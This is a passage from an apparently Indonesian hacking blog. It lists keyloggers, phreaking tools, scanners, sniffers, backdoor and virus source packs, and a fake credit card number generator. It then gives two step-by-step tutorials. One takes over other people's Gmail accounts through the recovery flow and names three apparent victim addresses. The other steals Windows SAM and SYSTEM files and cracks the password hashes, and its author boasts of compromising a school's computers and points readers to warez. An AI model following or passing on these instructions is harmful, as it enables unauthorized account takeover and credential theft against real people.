      7. Keytrap: log keyboard menyetem secara efektif!.
      8. Keycopy: Menyimpan suatu  catatan tentang segala aktivitas keyboard di komputer mu.
      9. Keylog: Meliputi keylog alat seperti Keylogwn, Keylog95, Keylog25 dan Keylog5, IKS12d-m.
      10. Acme PC: Memonitor aktivitas di PC dan menyimpan semua informasi di file LOG.
      11. Acme Pro PC: Memonitor perangkat lunak di PC dan menyimpan semua informasi di file LOG.
      12. Phantom2: Merekam dan playback suatu program tombol untuk MS-DOS.
      13. Playback!: merekam,semua task yang complit dan kemudian memanggil kembali dengan satu tombol.
      14. SKINNT: Monitoring program yang dikembangkan untuk Windows 2000 dan Windows NT.
      15. Skin: Memonitor kotak dari Skin5pro, Skin98as, Skint5, dan Skin5 Demo.
      16. Slog: Menyediakan anda dengan suatu batang kayu dari apa dengan anda sudah mengetik di komputer milik mu untuk tinjauan ulang yang kemudiannya.

      MISC

      1. Hack game: Setelah CrackAid dan Game Wizard 32, dua alat.
      2. HeadStrong WebClicker: menggunakan proxy publik untuk create artificial banner ad clicks
      3. Linux_Misc: koleksi linux tools dengan beberapa source file seperti TCFS, SILC, DDNSF, St Jude, FreeVSD.
      4. Misc: Meliputi banyak orang misc dari alat dan source program yang dapat melakukan pekerjaan seperti membajak, monitoring, atau penahanan, dan lain lain
      5. Quick Socket: Ijinkan anda administrator untuk chat ( via keyboard) secara langsung ke seorang pemakai yang remote juga runing Quick Socket.
      6. Shutdown 2000: Mengganggu jalannya program aplikasi
      7. Windows_Misc: Berisi bermacam-macam Windows misc alat, terutama Wat, Stealth Proxy, Outlook Header Exp, WebClicker2.0, Ap2.74, dan lain lain

      Packet forging

      1. Netcat: Membaca dan menulis kegunaan data ke seberang koneksi jaringan yang menggunakan protokol UDP atau TCP.
      2. Packet_Forging: Meliputi 21 file yang adalah semua dulu menciptakan dan mengirimkan paket yang berubah-ubah di jaringan ethernet.
      3. Packet_Tool: mempunyai 5 paket tools seperti tcpkill, packetx1, msmh, LibnetNT, arpinject di kotak.
      4. Pksnd102: Pengepakan 16 file seperti Winpkt, Pktsend, Ndis3pkt, Dump, Dumy, Dis_pkt9 di dalamnya, antar yang dikemasi/memenuhi atau file sumber dan file yang yang executable dari program pengarah paket.
      5. Ip Packet Capture/Creation Utility yang mentah: mengijinkan anda berkuasa penuh untuk secara langsung menempa paket yang bagaimanapun sesuai dengan keinginan.
      6. Snot: Gunakan snort rules files seperti sumber dari informasi paket nya.
      7. Winject: Inject paket untuk Windows 9x, juga disebut racun untuk Windows.

      Phreak tools

      1. Auto Dial: Membantu anda untuk gunakan suatu memutar angka telepon  dengan mudah.
      2. Blue Dial: Membuat lebih mudah untuk menciptakan dan menggunakan frekwensi berbeda  untuk memutar nomor telepon.
      3. Boxtone: Menciptakan nada telepon.
      4. CATCALL: Transaksi keluar dari sedikit kalimat mengganggu
      5. CHaoS DeViCe: menelepon acak pagers, menaruh suatu nomor telepon, hangs up,
      6. CPHREAK: Adalah fone yang pertama dengan kegunaan phreaking .
      7. Dialing Demon: Wardialer.
      8. Grim Scanner: Search pengangkut dan nada angka telepon di panggilan yang sama.
      9. No Carrier: Scan dengan Dos shell, grafik dan banyak lagi!.
      10. POCSAG Decoder: mengijinkan off-air mulai memecahkan kode dari isyarat pemberian nomor halaman POCSAG pada 512, 1200 atau 2400 bits/second.
      11. Pageit: Halaman suatu milyar (Am.) berbeda pagers dan di taro dalam  satu nomor;jumlah, atau Page ONE pager dan menaruh suatu milyar (Am.) angka-angka!.
      12. Phonetag: Melihat kemungkinan starttime tiap detik yang sedang  runing.
      13. Phreak box: Membangun dan penggunaan phreak kotak.
      14. Super Dial: no telp dari semua kota
      15. THC-SCAN: Meneliti area nomor telepon dengan modem mu.
      16. Little Operator: yang adalah yang lain wardialer.
      17. Tone Loc Utilities : Ini juga suatu wardialer.
      18. ToneLoc: nomor telp. mencari beberapa macam nada sesuai dengan itu.

      Scanner

      1. 7th Dimension Port Scanner: Meneliti alamat Port mu dengan mudah.
      2. AB Complete Ping: Ijinkan anda ke berdesing satu atau lebih alamat IP, meneliti suatu jaringan untuk sumber daya bersama dan untuk meneliti suatu komputer untuk Port yang terbuka.
      3. Angry IP Scanner: Meneliti IP dengan mudah dan dengan cepat!.
      4. Dave’S Port Sniffer: Mendeteksi FTP, HTTP, POP, SMTP, FINGER dan TELNET deamons runing di mesin tuan rumah TCP apapun.
      5. Deadbolt: Monitor celah di Windows dan siaga anda ketika yang mendeteksi aktivitas yang mencurigakan , memberi anda kuasa untuk memberhentikan  virus yangmematikani di track mereka.
      6. Linux-Vuln-Source: 2 Scanner seperti VLAD dan system security kit.
      7. Macanalysis: Deretan audit untuk Macintosh mu untuk melaksanakan dan bantuan menerapkan suatu standard keamanan untuk computer/network mu dengan melakukan beberapa pekerjaan.
      8. Netbios Security Kit(unix): untuk melakukan berbagai keamanan, memeriksa server remote yang runing file NetBIOS
      9. Netbios Security Kit(windows): untuk melakukan berbagai keamanan memeriksa server remote yang runing file NetBIOS
      10. Netmon: Memonitor koneksi jaringan.
      11. Nmap: Menyelidiki atau jaringan audit keamanan di Unix atau Linux.
      12. Invader Port: Meneliti suatu cakupan atau daftar IP menunjukkan memverifikasi jika ada terbuka atau tertutup Port.
      13. Scanner Port: Meneliti suatu kelompok alamat IP yang mencari kehadiran dari Port TCP/IP yang spesifik
      14. Portscan: scan Port dengan cepat dan configurably!.
      15. Port_Scanner: Collet 20 alat untuk gunakan di Port sacanner di Unix atau Linux!.
      16. Portscan SMS Alert: sinyal, tanda ketika scandlogd yang diselidiki membukukan informasi ke syslog
      17. Scanner: Mengumpulkan 84 alat dan misc untuk meneliti.
      18. Securescan NX: Meneliti arsitektur jaringan
      19. Skportscan ActiveX Control: Mengintegrasikan kemampuan membaca sekilas-Port ke dalam aplikasi mu dengan kendali ActiveX ini.
      20. THC-HAPPYBROWSER: Memeriksa suatu NT-Server/Webserver untuk sifat mudah kena luka yang dikenal.
      21. THC-PROBE: Meneliti kumpulan untuk Linux.
      22. THC-SCAN: Automate tone, carrier, vmb scanning.
      23. Whereisip: Temukan daerah lokasi anggota ICQ, dan banyak lagi.
      24. Windows_Trojan_Scanner: Mengumpulkan 6 alat yang sedikit membaca sekilas jaringan utuh untuk temukan Trojans yang terkenal.
      25. Windows_Port_Scanner: Mengumpulkan 9 Port Scanner runing di Windows.
      26. XSHAREZ Scanner: Meneliti, pencarian dan mendapat/kan sumber daya spesifik untuk anda.

      Sniffer

      1. Blackbox untuk AOL: Memonitor aplikasi untuk Online Amerika, AIM, ICQ, dan Yahoo Messenger.
      2. Colasoft Application Protocol Sniffer & Penganalisis: merupakan suatu TCP/IP Network Sniffer & Program penganalisis berdasar pada sistem Windows.
      3. Ethereal0814:  protokol jaringan analyzer’s gratis
      4. Ethereal0817: Meneliti jaringan protokol, versi yang lain tentang Ethereal.
      5. Ethereal0820: Meneliti protokol jaringan dengan bebas untuk Win32.
      6. Libpcap062: yang diperlukan Untuk menangkap paket kepada anda [sebagai/ketika] paket menangkap perpustakaan, pelepasan/release yang terakhir tentang Libpcap.
      7. Linux_Sniff_Source: Berisi 18 alat Sniffer di file sumber beberapa dan Linux.
      8. Littlebrother: Ijinkan para penyelia untuk dengan teliti mengatur dan mengukur internet dan pemakaian sumber daya jaringan.
      9. Netprob32 Network Analyzer: Meneliti, Monitor Traffic, dan program Generator Packet.
      10. Packetx: Mengintegrasikan winpcap paket menangkap kemampuan dengan VB atau lingkungan programming lain yang mendukung teknologi Microsoft ActiveX.
      11. Phenoelit’s own security sniffer: Membuka suatu tools penghubung jaringan untuk semua paket dan tidak hanya untuk paket, yang ini adalah mengirim kepada tools penghubung ini.
      12. Proxy Workbench:  merupakan suatu server wakil yang unik yang ideal untuk pengembang, ahli keamanan dan pelatih yang memajang data nya di realtime..
      13. Snarp: Ijinkan host untuk Sniffer data dari kawat.
      14. Sniff-Em: Berdasar pada suatu competively  Windows  sebagai penganalisis Network.
      15. Sniffers: Setelah 34 file di dalamnya dan antar yang adalah 28 source program beberapa dan alat Sniffer.
      16. Socket Workbench: Yang dirancang meneliti komunikasi Workbench
      17. Stealth Activity Recorder: Gunakan baru saja dan dengan mudah internet dimungkinkan tools untuk monitoring PCs bisnis dan rumah.
      18. Tcpdump362: Menangkap dan  pembuang program cantik,banyak untuk paket protokol yang asli.
      19. Windows_Sniff: Memudahkan menangkap dan pemberian gambar  dari kotak trafic jaringan dari 5 alat dan 1 file source program.
      20. Winpcap: Menangkap dan mengirimkan data mentah dari suatu kartu jaringan, bebaskan Packet Capture Architecture untuk Windows!.

      Snoop tools

      1  ID: Memajang informasi ID dari machine’s perangkat keras yang spesifik.
      2. IPQUERY: Menunjukkan  IP Address .
      3. Netrosnooper: Temukan file yang tersembunyi di internet!.
      4. Network Inventory: Menyediakan pengurus jaringan dengan kemampuan untuk melaksanakan suatu perangkat lunak [adalah] menginventarisir di semua mesin yang ditempatkan; terletak di suatu jaringan.
      5. Quadsoft’S IP Tool: Ceritakan [kepada] anda IP Address mu dalam suatu variasi dari jalan.
      6. Shellspy: Menjejaki tiap-tiap proses runing di PC mu.
      7. Trouble In Paradise: Menginstal tak lain hanya mesin gangguan mu dengan beberapa yang mempertunjukkan pesan.
      8. iNetTools untuk Windows: Mengumpulkan dikemudikan-menu yang menguji alat untuk jaringan IP-based dan internet.

      Source program

      1. APG: yang di-set Untuk generasi Password yang acak.
      2. ARP Monitor: Jejak arp meminta from/to mesin mu.
      3. Asm: Mencakup msmh, inpect, GetDialPasswords, [ini] merupakan suatu kotak.
      4. Backdoor: Meliputi 17 alat Backdoor di kotak dengan source program mereka.
      5. Blue Beep: Beep yang biru adalah suatu wardialer, ini meliputi source program nya.
      6. C_Source: Berisi 4 file di dalamnya, dan alat mendapatkan source program setelah decompress.
      7. Emailcrk: Crack Password dari e-mail account.
      8. Findhost: Meneliti Port di [netto/jaring] untuk anda.
      9. Harvester: Berisi sumber dari Harvester, yang memonitor direktori FTP dan halaman web yang remote.
      10. Igmpnuke: Gunakan paket IGMP tool’s source program.
      11. Jail Chroot Project: Membangun suatu lingkungan yang chrooted di POSIX dengan source program dari C.
      12. Keylogger_Src: Meliputi semua sumber yang penuh tentang Keylogger yang merekam tombol.
      13. Misc_Src: Misc source program dari 10 alat.
      14. Grep jaringan: Mimick sebanyak kemampuan di GNU grep  , diterapkan di lapisan jaringan.
      15. Nutcracker: Check/Crack tools Password untuk Unix/Linux.
      16. Pgpicq: Encrypt pesan ICQ mu yang menggunakan kehebatan world’s perangkat lunak encryption yang terbaik.
      17. Portscanner: Meneliti suatu kelompok alamat IP.
      18. Securityfocus ARIS Extractor: Meneliti batang kayu IDS secara canggih dan serangan saringan yang penting dari suara gaduh.
      19. Sharedecryption: inti berbagi Password dari pencatatan.
      20. VB_SOURCE: Berisi 14 file di dalamnya, dan mendapat/kan source program  setelah decompress
      21. Wnuke4: Ini adalah file sumber wnuke4 yang lengkap membungkus.
      22. Zebedee: Mengamankan celah IP tool’s source program!.

      Spoof

      1. Credit probe: Menciptakan angka-angka kartu kredit yang palsu.
      2. HTTPORT: Menetapkan suatu terowongan TCP/IP yang transparan melalui suatu server wakil.
      3. IP Spoofer: Ip dukungan yang Spoof kotak perangkat lunak.
      4. Ircgspoofer: Spoof perangkat lunak di IRC Ghost.
      5. Pinger: ISP Muslihat mu ke dalam pemikiran anda adalah selalu aktip..

      Virus

      1. Virus_Exe: Termasuk enam program virus paling khas yang executable.
      2. Virus_Source: Berisi source program virus di jadikan suatu paket

      Relate Post

      Saturday, May 8, 2010

      Hack Account Gmail Secara Acak

      Cara hack account gmail secara acak, ini hanya sebuah tutorial untuk bahan pembelajaran dan jika ada yang menyalah gunakan, maka resiko di tanggung penumpang,  
      Cara ini kita tidak usah menggunakan keylogger atau virus lain untuk mendapatkan password dari email
      alamat email korban akan di temukan secara acak,

      Oke kita mulai dengan langkah-langkah sebagai berikut:


      1. Buka browser kesayangan anda, lalu ketik http://www.mailinator.com



      2. Kemudian buka Gmail 


      3. Kemudian klik  Can't access your account?  pilih username recovery page

            
      4. Kemudian Isi dengan dengan sembarang nama yang kira-kira yang menarik dari anda, misal: jack, andi, disini saya menggukana nama tom@mailinator.com. Dan Isi kota dengan captcha dan klik Submit

      5. Kemudian buka kembali mailinator-nya kemudian ketik tom di kotak Check your inbox! lalu klik Go




      6. Kemudian akan terlihat email kiriman dari gmail tentang recovery username 

       

           Dari sini kita dapat hack account email:
           helloheyster@gmail.com
           loans4dreams@gmail.com
           ydenneknotyalc@gmail.com

      7. Langkah selanjutnya buka www.gmail.com  kemudian klik Can't access your account? dan pilih I forgot   my password, dan klik password recovery page

      8. Langkah selanjutnya alamat email yang telah ditemukan tadi pada langkah ke 6, misalnya : helloheyster@gmail.com


      9. Kemudian Buka kembali http://www.mailinator.com dan buka kembali inbox dari email, dan klik link yang diberikan dari gmail. dan silahkan anda ganti passwordnya sesuka hati anda..


      Semoga bisa bermanfaat, dan hanya untuk pelajaran.. www.acak-acak.co.cc tidak bertanggung jawab atas kesalahan yang di buat pembaca..

      Relate Post

      Friday, April 30, 2010

      TO GET ANY WINDOWS PASSWORD

      this works whether its windows 2000 or windows xp or windows xp SP1 or SP2 or windows server 2003....

      this works even if syskey encryption is employed...

      if it is FAT filesystem...

      just copy the sam file like stated in the first post to an empty floppy disk and take it home. I'll tell u what to do with it later... DON'T DELETE THE ORIGINAL SAM FILE. just remove its attributes. the sam file is a file called SAM with no extension. YOU MUST ALSO GET.... a file called SYSTEM which is in the same folder as SAM. both files have no extensions...

      if it is NTFS....

      u have to download a program called NTFSPro.... it allows u to read from ntfs drives... the demo version allows read only. the full version is read-write.... you use the program to create an unbootable disk (so u will still need another bootable disk and an empty disk) that has the required files to access NTFS.

      use the boot disk to get into dos, then use the disks created with ntfspro to be able to access the filesystem, then copy the SAM and SYSTEM files to another empty disk to take home....

      AT HOME: u have to get a program called SAMInside. it doesn't matter if it is demo version. SAMInside will open the SAM file and extract all the user account information and their passwords, including administrator. SAMInside will ask for the SYSTEM file too if the computer you took the SAM file from has syskey enabled. syskey encrypts the SAM file. SAMInside uses SYSTEM file to decrypt the SAM file. After SAMInside finishes, u still see user accounts and hashes beside them. the hashes are the encoded passwords. Use SAMInside to export the accounts and their hashes as a pwdump file into another program, called LophtCrack. it is currently in version 5, it is named LC5. the previous version, LC4 is just as good. u need the full or cracked version of the program. LC5 uses a brute force method by trying all possible combinations of letters numbers, and unprintable characters to find the correct password from the hashes in the pwdump file imported into it from SAMInside. This process of trying all passwords might take 5 minutes if the password is easy, up to a year if the password is long and hard (really really hard). LC5 howver, unlike LC4, is almost 100 times faster. both can be configured to try dictionary and common words before using all possible combinations of everything. Once the correct password is found, it will display the passwords in clear beside each account, including administrator.

      I use this method so many times. I've compromised the whole school computer infrastructure. LC4 usually took between 1 second and 10 minutes to find the passwords because they were common words found in any english dictionary. I haven't used LC5 yet.

      If there is anything unclear, anything I overlooked, plz tell me so that I can turn this into a very easy to follow tutorial to help anybody crack any windowz pass.

      Programs needed: SAMInside (doesn't matter which version or if demo)
      LC4 or LC5 (lophtcrack)( must be full version)
      NTFSPro (doesn't matter if demo)
      any bootdisk maker

      Cracked or full version software can be found on any warez site. If u don"t know what that is or where to get the programs, post a message and I'll tell u or give them to u.

      Relate Post

      Share

      Twitter Delicious Facebook Digg Stumbleupon Favorites